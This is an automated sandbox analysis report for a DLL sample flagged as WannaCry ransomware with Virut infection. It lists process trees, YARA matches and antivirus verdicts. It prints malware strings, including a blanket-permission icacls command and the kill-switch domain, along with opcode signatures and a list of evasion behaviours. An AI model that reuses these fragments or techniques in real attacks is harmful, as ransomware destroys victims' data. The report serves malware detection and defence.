Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y2jb4FtSNq

Overview

General Information

Sample Name:y2jb4FtSNq (renamed file extension from none to dll)
Analysis ID:672008
MD5:61d81fc3058ef67dd352bc2fd80bce2d
SHA1:bc7c0991e7e4646f8b2c9297a83a4259801e85bf
SHA256:66b760a1f256e538002892e020f0993d6e701dc15bb7333109b3a59b5b157082
Tags:dllOpenCTIBRSandboxed
Infos:

Detection

Wannacry, Virut
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Queries random domain names (often used to prevent blacklisting and sinkholes)
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6236 cmdline: loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6244 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6264 cmdline: rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 6360 cmdline: C:\WINDOWS\mssecsvc.exe MD5: B0F06045E4D3E693094C54C315A5B632)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 600 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
          • fontdrvhost.exe (PID: 684 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 704 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 756 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • backgroundTaskHost.exe (PID: 5704 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • svchost.exe (PID: 804 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 856 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • fontdrvhost.exe (PID: 900 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • dwm.exe (PID: 964 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
          • svchost.exe (PID: 280 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 328 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 384 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 848 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1080 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1092 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1156 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1264 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1312 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 6252 cmdline: rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 6500 cmdline: C:\WINDOWS\mssecsvc.exe MD5: B0F06045E4D3E693094C54C315A5B632)
        • tasksche.exe (PID: 3780 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 6636 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: B0F06045E4D3E693094C54C315A5B632)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6776 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6896 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 7008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7032 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5660 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
y2jb4FtSNq.dllWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
y2jb4FtSNq.dllJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    y2jb4FtSNq.dllwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
    C:\Windows\mssecsvc.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0x3136c:$x3: tasksche.exe
    • 0x4157c:$x3: tasksche.exe
    • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0x415d0:$x5: WNcry@2ol7
    • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
    • 0xe048:$x7: mssecsvc.exe
    • 0x17350:$x7: mssecsvc.exe
    • 0x31344:$x8: C:\%s\qeriuwjhrf
    • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xe034:$s1: C:\%s\%s
    • 0x17338:$s1: C:\%s\%s
    • 0x31358:$s1: C:\%s\%s
    • 0x414d0:$s3: cmd.exe /c "%s"
    • 0x73a24:$s4: msg/m_portuguese.wnry
    • 0x2e68c:$s5: \\192.168.56.20\IPC$
    • 0x1ba81:$s6: \\172.16.99.5\IPC$
    • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
    • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
    • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
    • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    C:\Windows\mssecsvc.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
    • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
    • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
    • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
    • 0x1d439:$s1: __TREEID__PLACEHOLDER__
    • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
    • 0x1f508:$s1: __TREEID__PLACEHOLDER__
    • 0x20570:$s1: __TREEID__PLACEHOLDER__
    • 0x215d8:$s1: __TREEID__PLACEHOLDER__
    • 0x22640:$s1: __TREEID__PLACEHOLDER__
    • 0x236a8:$s1: __TREEID__PLACEHOLDER__
    • 0x24710:$s1: __TREEID__PLACEHOLDER__
    • 0x25778:$s1: __TREEID__PLACEHOLDER__
    • 0x267e0:$s1: __TREEID__PLACEHOLDER__
    • 0x27848:$s1: __TREEID__PLACEHOLDER__
    • 0x288b0:$s1: __TREEID__PLACEHOLDER__
    • 0x29918:$s1: __TREEID__PLACEHOLDER__
    • 0x2a980:$s1: __TREEID__PLACEHOLDER__
    • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
    • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e340:$s1: __TREEID__PLACEHOLDER__
    Click to see the 3 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
      00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
        0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
          00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
            00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
              Click to see the 112 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.0.mssecsvc.exe.7100a4.3.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              8.0.mssecsvc.exe.7100a4.3.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              8.0.mssecsvc.exe.7100a4.3.unpackWin32_Ransomware_WannaCryunknownReversingLabs
              • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
              • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
              31.2.tasksche.exe.400000.0.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              31.2.tasksche.exe.400000.0.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              Click to see the 135 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: y2jb4FtSNq.dllVirustotal: Detection: 84%Perma Link
              Source: y2jb4FtSNq.dllMetadefender: Detection: 77%Perma Link
              Source: y2jb4FtSNq.dllReversingLabs: Detection: 92%
              Antivirus / Scanner detection for submitted sample
              Source: y2jb4FtSNq.dllAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 12%Perma Link
              Antivirus detection for dropped file
              Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/FileCoder.AU
              Source: C:\Windows\mssecsvc.exeAvira: detection malicious, Label: W32/Virut.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Windows\mssecsvc.exeMetadefender: Detection: 82%Perma Link
              Source: C:\Windows\mssecsvc.exeReversingLabs: Detection: 96%
              Source: C:\Windows\tasksche.exeMetadefender: Detection: 85%Perma Link
              Source: C:\Windows\tasksche.exeReversingLabs: Detection: 95%
              Machine Learning detection for sample
              Source: y2jb4FtSNq.dllJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
              Source: C:\Windows\mssecsvc.exeJoe Sandbox ML: detected
              Source: 4.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
              Source: 12.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 12.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
              Source: 8.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
              Source: 31.2.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 31.0.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
              Source: 8.2.mssecsvc.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
              Source: 12.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 12.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
              Source: 8.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
              Source: 8.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
              Source: C:\Windows\tasksche.exeCode function: 31_2_004018B9 CryptReleaseContext,31_2_004018B9
              Source: y2jb4FtSNq.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\TileDataRepository.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\Windows.StateRepository.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\ContentDeliveryManager.Utilities.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\SYSTEM32\usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\StateRepository.Core.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\usermgrproxy.dllJump to behavior

              Networking

              barindex
              Tries to download HTTP data from a sinkholed server
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Jul 2022 23:44:23 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72f00b44eb909134-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Jul 2022 23:46:05 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72f00dc0dd689165-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 